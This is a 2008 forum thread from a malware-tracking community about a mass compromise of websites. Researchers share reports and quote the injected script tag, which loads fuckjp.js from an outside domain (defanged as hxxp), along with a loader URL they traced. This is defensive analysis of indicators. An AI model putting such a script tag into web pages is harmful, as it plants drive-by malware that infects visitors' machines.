Malware Domain List
Malware Related => Malicious Domains => Topic started by: cjeremy on March 14, 2008, 03:58:34 pm
-
Saw this on SANS this morning: http://isc.sans.org/diary.html?storyid=4139 and I know Steven Adair from the Shadow Server Foundation... and he is a really sharp guy that posted more details here: http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313 and his personal blog is here: http://www.securityzone.org/
Doing a Google search for fuckjp.js looks like the 10,000 infected websites may be fairly accurate.
--jeremy
-
Excellent info - thanks! :)
-
of should have added this:
<script src=hxxp://www.2117966.net/fuckjp.js></script>
is what I have been seeing from my google search results....
-
This is giving a 404 at the moment. Anybody have a copy of fuckjp.js or fuckjp0.js ?
-
Found this blog entries here as well... :-\
http://www.dynamoo.com/blog/ (...scroll down a bit)
http://www.avertlabs.com/research/blog/index.php/2008/03/12/another-mass-attack-underway/
-
Here you go...it's officially 'leaked' now ;)
http://www.0x000000.com/?i=534
-
Might want to get Bobby to play with that for Malzilla ;)
-
Does not looks complete.
I'll try to trace back the variables, and get the URL if possible.
-
Looks like something along the lines of this, which is offline: a.njnk.net/cgi-bin/jl/jloader.pl?source=&system_id=none&qtver=0x